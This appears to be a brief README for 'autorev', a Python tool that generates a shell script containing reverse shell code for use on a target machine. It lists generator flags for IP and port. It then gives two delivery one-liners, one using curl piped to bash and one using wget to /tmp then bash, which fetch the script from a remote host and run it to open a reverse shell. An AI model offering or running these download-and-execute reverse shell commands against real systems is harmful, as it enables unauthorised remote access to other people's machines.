autorev.sh
The Pythone Script will generate a (.)sh file with reverse shell codes then you can execute the script on the target
Generating Usage
python3 autorev.py -i
-p
Using It On Target
Curl
curl
/autorev.sh | bash
Wget
wget
/autorev.sh -O /tmp/autorev.sh && bash /tmp/autorev.sh